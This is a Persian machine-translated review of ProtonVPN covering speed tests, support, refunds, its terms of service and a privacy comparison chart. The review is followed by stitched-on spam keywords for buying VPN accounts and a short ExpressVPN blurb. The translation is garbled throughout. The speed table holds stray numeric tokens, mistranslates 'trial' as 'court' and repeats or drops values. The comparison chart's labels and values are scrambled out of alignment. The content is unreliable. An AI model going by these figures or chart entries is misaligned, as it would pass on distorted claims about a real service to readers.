تست های سرعت و پایداری: سرعت روی سرورهایی که من آزمایش کردم پایدار اما ضعیف بود – سرور ایالات متحده تست شده تقریباً بالاتر از حداقل بود تا باند پهن نامیده شود ، در حالی که سرورهای بین المللی. همه نسبتاً کند بودند. توجه داشته باشید که از آنجا که ProtonVPN دارای سرورهای رایگان و سرورهای پرداخت شده است (متفاوت بودن سرعت و ظرفیت) ، تمام آزمایشات روی سرورهای پرداخت شده انجام می شود. همچنین ، تمام تست ها با استفاده از رمزگذاری AES-256 بیش از UDP اجرا می شوند.

Test Speed ​​- ProtonVPN
Latency بارگیری بارگذاری
بدون VPN دادگاه 1 [ ] 30 ms 98.20 mbps 31.06 mbps
آزمایشی 2 30 ms 98.16 mbps 31.36 mbps
محاکمه 3 31 ms 98.89 mbps 30.50 mbps
میانگین 30 ms 98.42 mb 30.97 mbps
USA محاکمه 1 106 19659059] 20.57 mbps 1.29 mbps
Trial 2 108 ms 20.70 mbps 1.16 mbps
Trial 19659066] 104 ms 20.65 mbps 1.22 mbps
میانگین [19659080] 106 ms 20.64 mbps 1.22 mbps
Comp to Bench +76 ms 20.97٪ 3.95٪
]
UK دادگاه 1 [ 283 ms 5.09 [Mbps] 6.76 mbps
Trial 2 294 ms 7.76 mbps 4.71 mbps
Trial 3 284 ms ms ms 7.69 mbps 6.59 mbps
میانگین 287 ms 6.85 mbps 6.02 mbps
Compps to Bench comp +257 ms 6.96٪ 19.44٪
Hong Kong Trial 1 332 ms 3.42 mbps 3.99 mbps
دادگاه 2 342 ms [19659066] 6.61 mbps 3.83 mbps
Trial 3 342 ms 6.53 mbps 3.93
mbps
میانگین ] 339 ms 5.52 mbps 3.92 mbps
Comp to Bench +308 ms 5.61٪ 12.65٪
استرالیا محاکمه 1 469 ms 4.63 mbps mbps mbps mbps mbps
Trial 2 453 ms 4.61 mbps 1.73 mbps
Trial 3 454 ms 4.66 mbps 1.76 mbps
میانگین 459 ms 4.63 mbps 1.71 mbps
Comp to Bench + 428 ms 4.71٪ 5.52٪

گرفتن پشتیبانی: من به حمایت از برخی questio عمومی رسیدم ns و یک پاسخ در 24 ساعت دریافت کرد – که هم ساده بود و هم کمک کننده. پیامی که من دریافت کردم احساس کنسرو احساس نمی شود ، و هیچ امضایی پف کرده یا بازاریابی کفاشی وجود نداشت. قطعاً این پشتیبانی یکی از بهترین جنبه های خدمات است ، اما ظاهراً در یک منطقه زمانی اروپا قرار دارد (همانطور که انتظار دارید) ، این بدان معناست که پاسخ شما به سوالات یا نگرانی ها معمولاً هنگام خواب می رسد.

بازپرداخت: من درخواست بازپرداخت را ارسال کردم و در کمتر از 24 ساعت پاسخ دریافت کردم. این یک معامله بزرگ نبوده است ، اما برای لغو ، شما باید قبل از صدور بازپرداخت ، برنامه خود را در پرتال کاربر دوباره به حالت "رایگان" برگردانید. عجیب به نظر می رسید که آنها از انتهای آنها این اختیار را نداشتند که بدون آن مرحله صادر کنند. من این کار را کردم و به آنها اطلاع دادم. روز بعد بازپرداخت دریافت کردم. نسبتاً بدون درد.

نگرانی در مورد شرایط و ضوابط / سیاست حفظ حریم خصوصی: سیاست ها و اصطلاحات نه کفایت و ظریف بودند ، بلکه در جایی میان هم قرار گرفتند. در حالی که مدت طولانی بودند ، آنها خیلی توهین آمیز نبودند.

کاری که ما هنگام استفاده از ProtonVPN انجام نمی دهیم:

  • ترافیک کاربر یا محتوای هرگونه ارتباط را وارد کنید.
  • تبعیض در برابر دستگاه ها ، پروتکل ها یا برنامه ها.
  • اتصال اینترنت خود را بریزید.

این شاید کمی گمراه کننده باشد یا حداقل شایسته توضیح باشد. لایه ی آزاد پشتیبانی P2P ندارد (می توانید استدلال كنید كه این پروتكلی است كه "از آن تبعیض آمیز است") ، اما می تواند به معنای معناشناسی بیاید.

ما از یك نصب محلی پیویك

پیویك استفاده می كنیم. یک افزونه آنالیز اطلاعاتی برای حفظ حریم خصوصی است ، که بسیار خوب است که در اینجا مورد استفاده قرار گیرد (بر خلاف گفته ها ، گوگل آنالیتیکس).

گزارش های اشکال بعضی اوقات به شخص ثالثی چون زندزک اعتماد دارند.

دست ، خدمات پسندیده ای برای حفظ حریم خصوصی نیست.

پرداخت و کمکهای ناعادلانه نقدی یا بیت کوین نیز پذیرفته شده است.

کاش یک اسناد کمی بیشتر در سایت وجود داشته باشد که این گزینه های پرداخت مربوط به آن باشند. بسیاری از علاقه مندان به حفظ حریم خصوصی ترجیح می دهند از این روش ها استفاده کنند ، اما من احساس می کنم آنها به شکلی واضح که مشخص نیست گذاشته شده اند.

فقط کارمندان شرکت دسترسی فیزیکی یا دیگری به سرورها دارند. معمولاً داده ها در قالب رمزگذاری شده روی سرورهای ما ذخیره می شوند. تهیه نسخه پشتیبان از آفلاین ممکن است به صورت دوره ای ذخیره شود ، اما این موارد نیز امن هستند.

خوشحالم که آنها در اینجا در مورد این صحبت می کنند. من فکر می کنم شرکا برای شفافیت در مورد جنبه های عملکرد خود مهم باشند که ممکن است خیلی از افراد آن را در نظر نگیرند ، اما به همان اندازه مهم هستند که هنگام بررسی حریم خصوصی و امنیت خود به آن فکر کنید.

تمام برنامه ها به طور خودکار تمدید می شوند. مدت صدور صورت حساب.

من اشتراک های امتناع را دوست ندارم. تمدید خودکار آزار دهنده است ، و فکر می کنم یک بار پرداخت باید گزینه ای برای ثبت نام باشد.

شرکت هیچ گونه ضمانتی در مورد قابلیت اطمینان سرویس ارائه نمی دهد و علی رغم بهترین استفاده از امنیت داده های کاربر را تضمین نمی کند. تلاش ها. خدمات "همانطور که هست" ارائه می شود و شما موافقت می کنید که شرکت را مسئولیت پذیر نبینید و یا به دنبال جبران خسارتهایی که ممکن است در نتیجه از دست دادن استفاده ، داده یا سودهای مرتبط با عملکرد سرویس یا عدم موفقیت باشد ، در نظر بگیرید. چنین عملکردی.

چرا این گفته ها (هرچند که ممکن است وجود داشته باشد) ، خیلی مرا آزار می دهد؟ من فقط از این متنفرم که وقتی یک شرکت به شما بگوید خدمات آنها چقدر عالی است ، شما این گفته ها را می خوانید و این باعث می شود که من دو برابر انجام دهم.

ممکن است ما محدودیت های استفاده یا خدمات را اعمال کنیم ، سرویس را به حالت تعلیق در آوریم یا مسدود کنیم. با استفاده از اختیار ما.

من می خواهم اطلاعات بیشتری راجع به چه شرایطی محدود ، معلق یا مسدود شوم. این به نظر من خیلی مبهم است.

شرکت در محدوده قانون قابل اجرا ، شرکت حق بازبینی و تغییر این توافق را در هر زمان محفوظ می دارد. شما وظیفه دارید مرتباً این قوانین و مقررات را مرور کنید. استفاده مداوم از خدمات پس از چنین تغییراتی رضایت شما از چنین تغییراتی را تشکیل می دهد.

درصد بسیار کمی از افرادی که از یک سرویس VPN معین استفاده می کنند ، همیشه شرایط را مطالعه می کنند. در حالی که این خوب است که قبل از خرید ، شرایط یک سرویس را بخوانید ، اما فکر می کنم شرکتی که به وی پستی را تحویل می دهد بدون اطلاع قبلی شرایط را تغییر دهد و بار سنگین را برای مشتری بگذارد تا مرتباً شرایط خدمات را مرور کند ، احمقانه است. شما یک آدرس ایمیل جمع آوری می کنید ، آیا این یک سیاستی برای ارسال یک اعلان برای این است که مردم بدانند چه چیزی و چه موقع ممکن است تغییر کند ، بیش از حد است؟

افکار نهایی: ProtonVPN یک واکنش ولرم از من گرفت. برخی از جنبه های وب سایت خود احساس ناقص یا بد فکر (فرایند ثبت نام) کرده اند. برخی دیگر احساس کاملتری دارند (داشبورد کاربر و پورتال بارگیری). در حالی که روند ثبت نام برای سرویس کمی دشوار بود ، پس از اتمام این مرحله ، همه چیز از بین رفت. سرویس و پیکربندی ها به راحتی تنظیم و وصل شدند ، اما سرعت هایی که من تجربه کردم عالی نبود. پشتیبانی یکی از جنبه های بهتر خدمات بود ، زیرا آنها سریع و مفید بودند. شرایط خدمات ProtonVPN نیز در وسط قرار داشت: برخی از ابروها ، اما هیچگونه معامله کننده ای ندارند. در پایان ، (به ویژه با توجه به قیمت بالای درخواست آن) ، من معتقدم که خدمات بهتری در بازار موجود است.

از نمودار مقایسه VPN
CATEGORY VPN SERVICE ProtonVPN
JURISDICTION [19659247] مستقر در (کشور) سوئیس
چهارده چشم؟ تعاونی
دشمن اینترنت شماره
LOGGING Logs Traffic No [1965924S] درخواست ها
Timestamps ثبت نام ها بله
پهنای باند لاگ
IP آدرس سیاهههای مربوط
ACTIVISM روش پرداخت ناشناس

ایمیل

Bitcoin را می پذیرد. بله خیر
به علل حفظ حریم خصوصی باز می گردد بله
دیدار با معیارهای PrivacyTools IO معیارها بله
محافظت در برابر سرورهای DNS اول 1 بله [IP659پشتیبانی خیر
OpenVPN پیشنهادات بله
OBFUSCATION پشتیبانی از Multihop [19659252] بله
پشتیبانی از TCP Port 443
پشتیبانی از Obfsproxy
پشتیبانی از SOCKS
پشتیبانی از تونل SSL
پشتیبانی از تونل SSH
سایر پروتکل های اختصاصی
PORT ] P2P برخی
SPEEDS میانگین سرور ایالات متحده٪ 20.97 [سرگرمی19659249] Int'l سرور متوسط٪ 5.76
سرویس دهنده اختصاصی یا مجازی [196593009] امنیت ] رمزگذاری داده پیش فرض AES-256
قویترین رمزگذاری داده ها AES-256
ضعیف ترین رمزنگاری دستی
قویترین رمزنگاری دستی

دسترسي

] # از کشورها 14
# سرورها 112
پشتیبانی لینوکس (کتابچه راهنمای کاربر) بله
وب سایت # کوکی های مداوم 0
# از [ردیابهایخارجی 0
# API های اختصاصی 1
رتبه SSL سرور A +
SSL Cert صادر شده به [19659252] خود
قیمت گذاری $ / ماه (قیمت گذاری سالانه) 8.00 $
$ / اتصال / ماه $ 1.60
محاکمه رایگان بازپرداخت دوره 60
ETHICS خط مشی های مخالف ورود به سیستم بله
به طور دروغ ادعا 100٪ مؤثر
Spam Spam Media Media
POLICIES Forbids Spam ] به افشای کامل نیاز دارد
AFFILIATES کپی اخلاقی را تمرین کنید
افشای کامل دهید

اگر پروژه را دوست دارید و کار من را مفید می دانید ، لطفاً اهدا کنید – کمکهای سخاوتمندانه شما برای پرداخت هزینه میزبانی ، ابزار و زمان لازم است که تحقیقاتم را انجام دهم و داده ها را تازه نگه دارم.

خرید vpn نثقهخ خرید vpn پرسرعت ارزان فیلم قسمت کانکشن فروش اکانت pptp

خرید vpn نثقهخ خرید vpn پرسرعت ارزان فیلم قسمت کانکشن فروش اکانت pptp

علت کانکشن تلگرام
خرید وی پی ن برای کامپیوتر آنتی فیلتر تور بروزر خرید کریو و سیسکو
انتی فیلتر اندروید دانلود کریو پارس سرور
خرید قرص پاور وی 8 فروش vpn 4speed خرید vpn هوشمند
خرید دی وی آر 4 کانال
دانلود کانکشن هوشمند speed vpn خرید اشتراک kerio vpn client
خرید نینتندو وی کانکشن دانشگاه گیلان دانلود کانکشن کریو 32

ExpressVPN نسخه های مجاز 5 دستگاه را منتشر می کند

ExpressVPN برنامه های آماده استفاده دارد که در ویندوز ، مک ، iOS ، اندروید و لینوکس کار خواهند کرد. مشترکین می توانند ExpressVPN را در هر دستگاه دلخواه خود نصب کنند ، زیرا هیچ محدودیتی برای نصب وجود ندارد ، بلکه فقط به پنج اتصال همزمان امکان پذیر است.

یک شبکه خصوصی مجازی یا VPN یک تونل مطمئن است که دستگاه و اینترنت شما را به هم وصل می کند. این مورد برای محافظت از ترافیک آنلاین شما از تداخل ، تعقیب و سانسور استفاده می شود.